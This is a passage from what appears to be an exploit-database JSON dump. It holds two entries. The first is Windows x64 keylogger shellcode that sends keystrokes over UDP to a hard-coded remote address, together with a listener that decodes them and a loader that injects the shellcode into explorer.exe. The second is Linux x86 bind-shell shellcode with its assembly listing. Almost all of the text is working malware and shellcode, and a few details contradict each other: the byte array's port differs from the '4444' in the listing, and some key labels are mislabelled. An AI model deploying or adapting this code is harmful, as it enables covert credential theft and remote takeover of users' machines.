'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1\r\n \r\nws2_32_func:\r\ndb 'WSAStartup',1,'socket',1,'sendto',1\r\n \r\n \r\nget_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer \r\ndb 0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3\r\n \r\n;-------------------------------------------------------------------------------------------------------------------\r\n_proceed_:\r\n \r\nsub rsp,88\r\npush r8\r\npush rdx\r\npush rcx\r\n \r\n \r\n \r\n \r\n;---------------------------------------------\r\nxor rsi,rsi\r\nmov rax,'HEREITIS'\r\nfind:\r\n \r\n \r\nmov r10,[rsp+rsi]\r\ninc rsi\r\ncmp r10,rax\r\njne find\r\n \r\nadd rsi,7\r\nlea rbx,[rsp+rsi]\r\nmov rdi,[rbx]\r\nmov r12,[rbx+8]\r\nmov r15,[rbx+16]\r\n \r\n \r\n;------------------------------------------------\r\ntest rcx,rcx\r\njnz short _out_\r\n \r\nxor rbx,rbx\r\nmov bl,1\r\nshl rbx,8\r\n \r\ncmp rdx,rbx\r\njne short _out_\r\n \r\n \r\n;--------------------------------------------------------\r\n \r\nmov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL)\r\nxor rcx,rcx\r\nmov cl,0x14\r\ncall rbx\r\n \r\nmov [r12],ax\r\n \r\nmov rbx,[rdi+32] ;GetKeyState(VK_SHIFT)\r\nxor rcx,rcx\r\nmov cl,0x10\r\ncall rbx\r\n \r\nmov [r12+2],ax\r\n \r\n \r\n \r\n \r\n;-------------------------------\r\n;sending keystrokes\r\nmov rbx,[rsp+16]\r\nmov eax,[rbx]\r\nmov [r12+4],eax ;Virtual key code\r\n \r\nsub rsp,88\r\nmov rcx,[rdi+8] ;SOCKET\r\npush r12\r\npop rdx\r\n \r\nxor r9,r9\r\npush r9\r\n \r\npop r8\r\nmov r8b,16\r\nmov [rsp+32],r15\r\nmov [rsp+40],r8\r\nsub r8,8\r\n \r\nmov rbx,[rdi+80]\r\ncall rbx\r\nadd rsp,88\r\n \r\n \r\n;-----------------------------------------------------------\r\n \r\n_out_:\r\n \r\npop rdx\r\npop r8\r\npop r9\r\n \r\n \r\nmov rbx,[rdi+24]\r\n \r\nxor rcx,rcx\r\n \r\ncall rbx\r\n \r\n \r\nadd rsp,88\r\n \r\n \r\nret\r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n/*\r\n \r\n//keylogger Handler\r\n \r\n#include<stdio.h>\r\n#include<winsock2.h>\r\n#include<windows.h>\r\n \r\n#pragma pack(1)\r\n \r\ntypedef struct key\r\n{\r\n short caps;\r\n short shift;\r\n DWORD vkcode;\r\n}KEYDATA;\r\n \r\n \r\nchar * Determine(BOOL caps,BOOL shift,DWORD code)\r\n{\r\n char * key;\r\n switch (code) // SWITCH ON INT\r\n {\r\n case 0x41: key = caps ? (shift ? \"a\" : \"A\") : (shift ? \"A\" : \"a\"); break;\r\n case 0x42: key = caps ? (shift ? \"b\" : \"B\") : (shift ? \"B\" : \"b\"); break;\r\n case 0x43: key = caps ? (shift ? \"c\" : \"C\") : (shift ? \"C\" : \"c\"); break;\r\n case 0x44: key = caps ? (shift ? \"d\" : \"D\") : (shift ? \"D\" : \"d\"); break;\r\n case 0x45: key = caps ? (shift ? \"e\" : \"E\") : (shift ? \"E\" : \"e\"); break;\r\n case 0x46: key = caps ? (shift ? \"f\" : \"F\") : (shift ? \"F\" : \"f\"); break;\r\n case 0x47: key = caps ? (shift ? \"g\" : \"G\") : (shift ? \"G\" : \"g\"); break;\r\n case 0x48: key = caps ? (shift ? \"h\" : \"H\") : (shift ? \"H\" : \"h\"); break;\r\n case 0x49: key = caps ? (shift ? \"i\" : \"I\") : (shift ? \"I\" : \"i\"); break;\r\n case 0x4A: key = caps ? (shift ? \"j\" : \"J\") : (shift ? \"J\" : \"j\"); break;\r\n case 0x4B: key = caps ? (shift ? \"k\" : \"K\") : (shift ? \"K\" : \"k\"); break;\r\n case 0x4C: key = caps ? (shift ? \"l\" : \"L\") : (shift ? \"L\" : \"l\"); break;\r\n case 0x4D: key = caps ? (shift ? \"m\" : \"M\") : (shift ? \"M\" : \"m\"); break;\r\n case 0x4E: key = caps ? (shift ? \"n\" : \"N\") : (shift ? \"N\" : \"n\"); break;\r\n case 0x4F: key = caps ? (shift ? \"o\" : \"O\") : (shift ? \"O\" : \"o\"); break;\r\n case 0x50: key = caps ? (shift ? \"p\" : \"P\") : (shift ? \"P\" : \"p\"); break;\r\n case 0x51: key = caps ? (shift ? \"q\" : \"Q\") : (shift ? \"Q\" : \"q\"); break;\r\n case 0x52: key = caps ? (shift ? \"r\" : \"R\") : (shift ? \"R\" : \"r\"); break;\r\n case 0x53: key = caps ? (shift ? \"s\" : \"S\") : (shift ? \"S\" : \"s\"); break;\r\n case 0x54: key = caps ? (shift ? \"t\" : \"T\") : (shift ? \"T\" : \"t\"); break;\r\n case 0x55: key = caps ? (shift ? \"u\" : \"U\") : (shift ? \"U\" : \"u\"); break;\r\n case 0x56: key = caps ? (shift ? \"v\" : \"V\") : (shift ? \"V\" : \"v\"); break;\r\n case 0x57: key = caps ? (shift ? \"w\" : \"W\") : (shift ? \"W\" : \"w\"); break;\r\n case 0x58: key = caps ? (shift ? \"x\" : \"X\") : (shift ? \"X\" : \"x\"); break;\r\n case 0x59: key = caps ? (shift ? \"y\" : \"Y\") : (shift ? \"Y\" : \"y\"); break;\r\n case 0x5A: key = caps ? (shift ? \"z\" : \"Z\") : (shift ? \"Z\" : \"z\"); break;\r\n // Sleep Key\r\n case VK_SLEEP: key = \"[SLEEP]\"; break;\r\n // Num Keyboard \r\n case VK_NUMPAD0: key = \"0\"; break;\r\n case VK_NUMPAD1: key = \"1\"; break;\r\n case VK_NUMPAD2 : key = \"2\"; break;\r\n case VK_NUMPAD3: key = \"3\"; break;\r\n case VK_NUMPAD4: key = \"4\"; break;\r\n case VK_NUMPAD5: key = \"5\"; break;\r\n case VK_NUMPAD6: key = \"6\"; break;\r\n case VK_NUMPAD7: key = \"7\"; break;\r\n case VK_NUMPAD8: key = \"8\"; break;\r\n case VK_NUMPAD9: key = \"9\"; break;\r\n case VK_MULTIPLY: key = \"*\"; break;\r\n case VK_ADD: key = \"+\"; break;\r\n case VK_SEPARATOR: key = \"-\"; break;\r\n case VK_SUBTRACT: key = \"-\"; break;\r\n case VK_DECIMAL: key = \".\"; break;\r\n case VK_DIVIDE: key = \"/\"; break;\r\n // Function Keys\r\n case VK_F1: key = \"[F1]\"; break;\r\n case VK_F2: key = \"[F2]\"; break;\r\n case VK_F3: key = \"[F3]\"; break;\r\n case VK_F4: key = \"[F4]\"; break;\r\n case VK_F5: key = \"[F5]\"; break;\r\n case VK_F6: key = \"[F6]\"; break;\r\n case VK_F7: key = \"[F7]\"; break;\r\n case VK_F8: key = \"[F8]\"; break;\r\n case VK_F9: key = \"[F9]\"; break;\r\n case VK_F10: key = \"[F10]\"; break;\r\n case VK_F11: key = \"[F11]\"; break;\r\n case VK_F12: key = \"[F12]\"; break;\r\n case VK_F13: key = \"[F13]\"; break;\r\n case VK_F14: key = \"[F14]\"; break;\r\n case VK_F15: key = \"[F15]\"; break;\r\n case VK_F16: key = \"[F16]\"; break;\r\n case VK_F17: key = \"[F17]\"; break;\r\n case VK_F18: key = \"[F18]\"; break;\r\n case VK_F19: key = \"[F19]\"; break;\r\n case VK_F20: key = \"[F20]\"; break;\r\n case VK_F21: key = \"[F22]\"; break;\r\n case VK_F22: key = \"[F23]\"; break;\r\n case VK_F23: key = \"[F24]\"; break;\r\n case VK_F24: key = \"[F25]\"; break;\r\n // Keys\r\n case VK_NUMLOCK: key = \"[NUM-LOCK]\"; break;\r\n case VK_SCROLL: key = \"[SCROLL-LOCK]\"; break;\r\n case VK_BACK: key = \"[BACK]\"; break;\r\n case VK_TAB: key = \"[TAB]\"; break;\r\n case VK_CLEAR: key = \"[CLEAR]\"; break;\r\n case VK_RETURN: key = \"[ENTER]\"; break;\r\n case VK_SHIFT: key = \"[SHIFT]\"; break;\r\n case VK_CONTROL: key = \"[CTRL]\"; break;\r\n case VK_MENU: key = \"[ALT]\"; break;\r\n case VK_PAUSE: key = \"[PAUSE]\"; break;\r\n case VK_CAPITAL: key = \"[CAP-LOCK]\"; break;\r\n case VK_ESCAPE: key = \"[ESC]\"; break;\r\n case VK_SPACE: key = \"[SPACE]\"; break;\r\n case VK_PRIOR: key = \"[PAGEUP]\"; break;\r\n case VK_NEXT: key = \"[PAGEDOWN]\"; break;\r\n case VK_END: key = \"[END]\"; break;\r\n case VK_HOME: key = \"[HOME]\"; break;\r\n case VK_LEFT: key = \"[LEFT]\"; break;\r\n case VK_UP: key = \"[UP]\"; break;\r\n case VK_RIGHT: key = \"[RIGHT]\"; break;\r\n case VK_DOWN: key = \"[DOWN]\"; break;\r\n case VK_SELECT: key = \"[SELECT]\"; break;\r\n case VK_PRINT: key = \"[PRINT]\"; break;\r\n case VK_SNAPSHOT: key = \"[PRTSCRN]\"; break;\r\n case VK_INSERT: key = \"[INS]\"; break;\r\n case VK_DELETE: key = \"[DEL]\"; break;\r\n case VK_HELP: key = \"[HELP]\"; break;\r\n // Number Keys with shift\r\n case 0x30: key = shift ? \")\" : \"0\"; break; \r\n case 0x31: key = shift ? \"!\" : \"1\"; break;\r\n case 0x32: key = shift ? \"@\" : \"2\"; break;\r\n case 0x33: key = shift ? \"#\" : \"3\"; break;\r\n case 0x34: key = shift ? \"$\" : \"4\"; break;\r\n case 0x35: key = shift ? \"%\" : \"5\"; break;\r\n case 0x36: key = shift ? \"^\" : \"6\"; break;\r\n case 0x37: key = shift ? \"&\" : \"7\"; break;\r\n case 0x38: key = shift ? \"*\" : \"8\"; break;\r\n case 0x39: key = shift ? \"(\" : \"9\"; break;\r\n // Windows Keys\r\n case VK_LWIN: key = \"[WIN]\"; break;\r\n case VK_RWIN: key = \"[WIN]\"; break;\r\n case VK_LSHIFT: key = \"[SHIFT]\"; break;\r\n case VK_RSHIFT: key = \"[SHIFT]\"; break;\r\n case VK_LCONTROL: key = \"[CTRL]\"; break;\r\n case VK_RCONTROL: key = \"[CTRL]\"; break;\r\n // OEM Keys with shift \r\n case VK_OEM_1: key = shift ? \":\" : \";\"; break;\r\n case VK_OEM_PLUS: key = shift ? \"+\" : \"=\"; break;\r\n case VK_OEM_COMMA: key = shift ? \"<\" : \",\"; break; \r\n case VK_OEM_MINUS: key = shift ? \"_\" : \"-\"; break;\r\n case VK_OEM_PERIOD: key = shift ? \">\" : \".\"; break;\r\n case VK_OEM_2: key = shift ? \"?\" : \"/\"; break;\r\n case VK_OEM_3: key = shift ? \"~\" : \"`\"; break;\r\n case VK_OEM_4: key = shift ? \"{\" : \"[\"; break;\r\n case VK_OEM_5: key = shift ? \"|\" : \"\\\\\"; break;\r\n case VK_OEM_6: key = shift ? \"}\" : \"]\"; break;\r\n case VK_OEM_7: key = shift ? \"\\\"\" : \"'\"; break; //TODO: Escape this char: \"\r\n // Action Keys\r\n case VK_PLAY: key = \"[PLAY]\";break;\r\n case VK_ZOOM: key = \"[ZOOM]\";break;\r\n case VK_OEM_CLEAR: key = \"[CLEAR]\";break;\r\n case VK_CANCEL: key = \"[CTRL-C]\";break;\r\n \r\n default: key = \"[UNK-KEY]\";break;\r\n }\r\n return key;\r\n}\r\n \r\n \r\n \r\nint main()\r\n{\r\n int port;\r\n SOCKET s;\r\n struct sockaddr_in sr,cr;\r\n WSADATA wsa;\r\n KEYDATA keystrk;\r\n char * n;\r\n \r\n printf(\"Enter Port Number To Listen: \");\r\n scanf(\"%d\",&port);\r\n \r\n if(WSAStartup(514,&wsa))\r\n {\r\n printf(\"WSAStartup() Failed\");\r\n return 0;\r\n }\r\n \r\n if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)\r\n {\r\n printf(\"Failed To Create Socket...\");\r\n return 0;\r\n }\r\n \r\n ZeroMemory(&sr,16);\r\n sr.sin_family=AF_INET;\r\n sr.sin_port=htons(port);\r\n \r\n if(bind(s,(struct sockaddr *)&sr,16))\r\n {\r\n printf(\"Failed To Bind..\");\r\n return 0;\r\n }\r\n \r\n port=16; //Why bother to declare a variable for int * fromlen\r\n while(1)\r\n {\r\n recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port);\r\n n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode);\r\n printf(\"%s\",n);\r\n }\r\n return 0;\r\n}\r\n \r\n \r\n \r\n*/\r\n \r\n \r\n#include<windows.h>\r\n#include<stdio.h>\r\n#include<string.h>\r\n#include<tlhelp32.h>\r\n \r\nchar shellcode[]=\"\\xeb\\x1d\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x30\\x48\\x8b\\x06\\x48\\x8b\\x70\\x20\\x5b\\x53\\xc3\\xe8\\xde\\xff\\xff\\xff\\x52\\x52\\x4c\\x8d\\x3c\\x24\\x48\\x83\\xec\\x38\\x4c\\x8d\\x24\\x24\\x48\\x83\\xec\\x58\\x48\\x8d\\x3c\\x24\\x41\\x57\\x41\\x54\\x57\\x48\\xb8\\x48\\x45\\x52\\x45\\x49\\x54\\x49\\x53\\x50\\x48\\x31\\xc0\\x66\\xb8\\xcc\\x01\\x48\\x01\\xc3\\x53\\x48\\x89\\xf1\\x48\\x8d\\x93\\x6e\\xff\\xff\\xff\\x4d\\x31\\xc0\\x41\\xb0\\x02\\x49\\x89\\xf9\\xff\\xd3\\x41\\x5d\\x48\\x31\\xc0\\x50\\x50\\x48\\xb8\\x77\\x73\\x32\\x5f\\x33\\x32\\x2e\\x64\\x48\\x89\\x04\\x24\\x66\\xc7\\x44\\x24\\x08\\x6c\\x6c\\x48\\x8d\\x0c\\x24\\x48\\x8b\\x77\\x08\\x48\\x83\\xec\\x28\\xff\\xd6\\x48\\x96\\x48\\x8d\\x4c\\x24\\x28\\xc7\\x01\\x75\\x73\\x65\\x72\\xff\\xd0\\x48\\x89\\xc1\\x49\\x8d\\x55\\x8c\\x4d\\x31\\xc0\\x41\\xb0\\x06\\x4c\\x8d\\x4f\\x10\\x41\\xff\\xd5\\x48\\x89\\xf1\\x49\\x8d\\x55\\xe7\\x4d\\x31\\xc0\\x41\\xb0\\x03\\x4c\\x8d\\x4f\\x40\\x41\\xff\\xd5\\x48\\x83\\xc4\\x38\\x48\\x31\\xc9\\x66\\xb9\\x98\\x01\\x48\\x29\\xcc\\x48\\x83\\xc1\\x6a\\x48\\x8d\\x14\\x24\\x48\\x8b\\x5f\\x40\\xff\\xd3\\x48\\x31\\xc9\\xb1\\x02\\x51\\x51\\x5a\\x41\\x58\\x41\\xb0\\x11\\x48\\x8b\\x5f\\x48\\xff\\xd3\\x48\\x89\\x47\\x08\\x48\\x8b\\x1f\\x48\\x31\\xc9\\xff\\xd3\\x41\\xc6\\x07\\x02\\x66\\x41\\xc7\\x47\\x02\\xdb\\x83\\x41\\xc7\\x47\\x04\\xc1\\xa1\\xc1\\x63\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x59\\x5a\\xb1\\x0d\\x49\\x89\\xc0\\xb2\\xbc\\x4c\\x01\\xea\\x48\\x8b\\x5f\\x10\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x48\\x8b\\x5f\\x28\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x8b\\x5f\\x30\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x8b\\x5f\\x38\\xff\\xd3\\xeb\\xd4\\x47\\x65\\x74\\x4d\\x6f\\x64\\x75\\x6c\\x65\\x48\\x61\\x6e\\x64\\x6c\\x65\\x41\\x01\\x4c\\x6f\\x61\\x64\\x4c\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x01\\x53\\x65\\x74\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x48\\x6f\\x6f\\x6b\\x45\\x78\\x41\\x01\\x43\\x61\\x6c\\x6c\\x4e\\x65\\x78\\x74\\x48\\x6f\\x6f\\x6b\\x45\\x78\\x01\\x47\\x65\\x74\\x4b\\x65\\x79\\x53\\x74\\x61\\x74\\x65\\x01\\x47\\x65\\x74\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x41\\x01\\x54\\x72\\x61\\x6e\\x73\\x6c\\x61\\x74\\x65\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x01\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x41\\x01\\x57\\x53\\x41\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x01\\x73\\x6f\\x63\\x6b\\x65\\x74\\x01\\x73\\x65\\x6e\\x64\\x74\\x6f\\x01\\x56\\x57\\x41\\x50\\x52\\x41\\x51\\x51\\x41\\x5b\\x48\\x31\\xdb\\x53\\x53\\x5a\\x58\\x8b\\x59\\x3c\\x48\\x01\\xcb\\xb2\\x88\\x8b\\x04\\x13\\x48\\x01\\xc8\\x48\\x31\\xd2\\x52\\x52\\x52\\x41\\x58\\x41\\x59\\x41\\x5a\\x44\\x8b\\x40\\x20\\x4d\\x01\\xd8\\x44\\x8b\\x48\\x24\\x4d\\x01\\xd9\\x44\\x8b\\x50\\x1c\\x4d\\x01\\xda\\x48\\x31\\xd2\\x48\\x31\\xf6\\x56\\x59\\x41\\x8b\\x34\\x90\\x4c\\x01\\xde\\x48\\x8b\\x7c\\x24\\x08\\x48\\x31\\xc0\\x8a\\x04\\x0f\\x48\\xff\\xc1\\x3c\\x01\\x75\\xf6\\x48\\xff\\xc2\\x51\\x48\\xff\\xc9\\x48\\x87\\xf7\\xf3\\xa6\\x59\\x75\\xd3\\x48\\xff\\xca\\x48\\x8b\\x7c\\x24\\x08\\x48\\x01\\xcf\\x48\\x89\\x7c\\x24\\x08\\x48\\x31\\xdb\\x53\\x58\\x66\\x41\\x8b\\x1c\\x51\\x41\\x8b\\x04\\x9a\\x4c\\x01\\xd8\\x48\\x8b\\x1c\\x24\\x48\\x89\\x03\\x48\\x83\\xc3\\x08\\x48\\x89\\x1c\\x24\\x48\\x8b\\x5c\\x24\\x10\\x48\\xff\\xcb\\x48\\x89\\x5c\\x24\\x10\\x48\\x31\\xd2\\x48\\x39\\xd3\\x75\\x8e\\x48\\x83\\xc4\\x18\\x5f\\x5e\\xc3\\x48\\x83\\xec\\x58\\x41\\x50\\x52\\x51\\x48\\x31\\xf6\\x48\\xb8\\x48\\x45\\x52\\x45\\x49\\x54\\x49\\x53\\x4c\\x8b\\x14\\x34\\x48\\xff\\xc6\\x49\\x39\\xc2\\x75\\xf4\\x48\\x83\\xc6\\x07\\x48\\x8d\\x1c\\x34\\x48\\x8b\\x3b\\x4c\\x8b\\x63\\x08\\x4c\\x8b\\x7b\\x10\\x48\\x85\\xc9\\x75\\x68\\x48\\x31\\xdb\\xb3\\x01\\x48\\xc1\\xe3\\x08\\x48\\x39\\xda\\x75\\x5a\\x48\\x8b\\x5f\\x20\\x48\\x31\\xc9\\xb1\\x14\\xff\\xd3\\x66\\x41\\x89\\x04\\x24\\x48\\x8b\\x5f\\x20\\x48\\x31\\xc9\\xb1\\x10\\xff\\xd3\\x66\\x41\\x89\\x44\\x24\\x02\\x48\\x8b\\x5c\\x24\\x10\\x8b\\x03\\x41\\x89\\x44\\x24\\x04\\x48\\x83\\xec\\x58\\x48\\x8b\\x4f\\x08\\x41\\x54\\x5a\\x4d\\x31\\xc9\\x41\\x51\\x41\\x58\\x41\\xb0\\x10\\x4c\\x89\\x7c\\x24\\x20\\x4c\\x89\\x44\\x24\\x28\\x49\\x83\\xe8\\x08\\x48\\x8b\\x5f\\x50\\xff\\xd3\\x48\\x83\\xc4\\x58\\x5a\\x41\\x58\\x41\\x59\\x48\\x8b\\x5f\\x18\\x48\\x31\\xc9\\xff\\xd3\\x48\\x83\\xc4\\x58\\xc3\";\r\n \r\n \r\n \r\nint main()\r\n{\r\n HANDLE s,proc;\r\n PROCESSENTRY32 ps;\r\n BOOL process_found=0;\r\n LPVOID shell;\r\n SIZE_T total;\r\n \r\n //finding explorer.exe pid\r\n \r\n ps.dwSize=sizeof(ps);\r\n \r\n s=CreateToolhelp32Snapshot(2,0);\r\n \r\n if(s==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"CreateToolhelp32Snapshot() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n if(!Process32First(s,&ps))\r\n {\r\n printf(\"Process32First() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n \r\n do{\r\n if(0==strcmp(ps.szExeFile,\"explorer.exe\"))\r\n {\r\n process_found=1;\r\n break;\r\n }\r\n }while(Process32Next(s,&ps));\r\n \r\n \r\n if(!process_found)\r\n {\r\n printf(\"Unknown Process\\n\");\r\n return -1;\r\n }\r\n \r\n \r\n //opening process using pid \r\n \r\n \r\n proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);\r\n \r\n if(proc==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"OpenProcess() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n } \r\n \r\n \r\n //allocating memory process memory\r\n \r\n if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)\r\n {\r\n printf(\"Failed to allocate memory into process\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //writing shellcode into process memory\r\n \r\n WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);\r\n \r\n if(sizeof(shellcode)!=total)\r\n {\r\n printf(\"Failed write shellcode into process memory\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //Executing shellcode\r\n \r\n if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)\r\n {\r\n printf(\"Failed to Execute shellcode\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n CloseHandle(proc);\r\n CloseHandle(s);\r\n \r\n return 0;\r\n \r\n \r\n}\n\n# 0day.today [2018-10-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31462"}, {"lastseen": "2018-06-01T01:08:24", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-05-31T00:00:00", "published": "2018-05-31T00:00:00", "id": "1337DAY-ID-30511", "href": "https://0day.today/exploit/description/30511", "title": "Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)", "type": "zdt", "sourceData": "/*\r\n; Filename: tcp_bind_shellcode_light.nasm\r\n; Author: Paolo Perego <[email\u00a0protected]>\r\n; Website: https://codiceinsicuro.it\r\n; Twitter: @thesp0nge\r\n; SLAE-ID: 1217\r\n; Purpose: binds on TCP port 4444 and spawn a shell on incoming\r\nconnections.\r\n \r\n \r\nglobal _start\r\n \r\nsection .text\r\n \r\n_start:\r\n; Creating the socket.\r\n;\r\n; int socket(int domain, int type, int protocol);\r\n;\r\n; socket() is defined as #define __NR_socket 359 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h\r\n; SOCK_STREAM is defined as 1 in\r\n/usr/include/i386-linux-gnu/bits/socket_type.h\r\nxor eax, eax\r\nmov ebx, eax\r\nmov ecx, eax\r\nmov edx, eax\r\n \r\nmov ax, 0x167 ; 359 in decimal\r\nmov bl, 0x2\r\nmov cl, 0x1\r\n \r\nint 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);\r\nmov ebx, eax ; storing the socket descriptor into EBX for next syscall\r\n \r\n;push eax ; save socket descriptor into the stack\r\n \r\n; Binding the socket to 0.0.0.0 address at port 4444\r\n;\r\n; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\r\n;\r\n;\r\n; bind() is defined as #define __NR_bind 361 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\nmov ax, 0x169 ; 361 in decimal\r\nxor ecx, ecx\r\npush ecx ; pushing 32 bit INADDR_ANY\r\npush word 0x5c11 ; pushing PORT 4444 in network byte order\r\npush word 0x2 ; pushing AF_INET as sin_family\r\n \r\nmov ecx, esp ; now ECX points to the my_addr data structure\r\nmov dl, 0x10 ; sizeof(my_addr) = 16 bytes\r\nint 0x80 ; bind(sfd, (struct sockaddr *) &my_addr, sizeof(my_addr));\r\n \r\n; Listening on opened socket bound to port 4444\r\n;\r\n; int listen(int sockfd, int backlog);\r\n;\r\n; listen() is defined as #define __NR_listen 363 in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\nxor ecx, ecx\r\nxor eax, eax\r\nmov ax, 0x16b ; 363 in decimal\r\nint 0x80 ; listen(sfd, 0);\r\n \r\n; Accepting incoming connection on listening socket\r\n;\r\n; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\r\n;\r\n; accept() is not defined as syscall in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h.\r\n; Instead accept4() is defined as #define __NR_accept4 364.\r\n;\r\n; From the man page, accept4() has the followint prototype:\r\n; int accept4(int sockfd, struct sockaddr *addr, socklen_t *addrlen, int\r\nflags);\r\n;\r\n; The last integer, as from the man page, if set to 0 makes the\r\n; accept4() call to behave as the same as the accept()\r\nxor eax, eax\r\nmov ax, 0x16c ; 364 in decimal\r\n \r\npush ecx ; ECX is 0, pushing on the stack\r\n \r\nmov esi, ecx\r\nmov ecx, esp ; ECX now points to a zero bytes region from the stack.\r\nmov edx, esp\r\n \r\nint 0x80 ; cfd = accept4(sfd, NULL, NULL, 0);\r\n \r\nmov ebx, eax ; Saving socket descript resulting from accept4 into EBX\r\n \r\n; Duplicating descriptor 0, 1, 2 to the socket opened by client\r\n;\r\n; int dup2(int oldfd, int newfd);\r\n;\r\n; dup2 is defined as #define __NR_dup2 63 in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor ecx, ecx\r\nmov cl, 2\r\nxor eax, eax\r\n \r\ndup2:\r\nmov al, 0x3F ; 63 in decimal\r\nint 0x80 ; duplicating file descriptors in backwards order; from 2 to 0\r\ndec ecx\r\njns dup2\r\n \r\n; Executing shell\r\n;\r\n; int execve(const char *filename, char *const argv[], char *const envp[]);\r\n; execve() is defined as #define __NR_execve 11 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\npush eax ; The NULL byte\r\npush 0x68732f2f ; \"sh//\". The second '\\' is used to align our command into\r\nthe stack\r\npush 0x6e69622f ; \"nib/\"\r\nmov ebx, esp ; EBX now points to \"/bin//sh\"\r\nxor ecx, ecx\r\nxor edx, edx\r\nmov al, 0xB ; 11 in decimal\r\nint 0x80\r\n \r\n */\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n \r\n \"\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc3\\x31\\xc0\\x66\\xb8\\x69\\x01\\x31\\xc9\\x51\\x66\\x68\\x15\\xb3\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc9\\x31\\xc0\\x66\\xb8\\x6b\\x01\\xcd\\x80\\x31\\xc0\\x66\\xb8\\x6c\\x01\\x51\\x89\\xce\\x89\\xe1\\x89\\xe2\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb1\\x02\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xb0\\x0b\\xcd\\x80\";\r\n \r\n \r\n 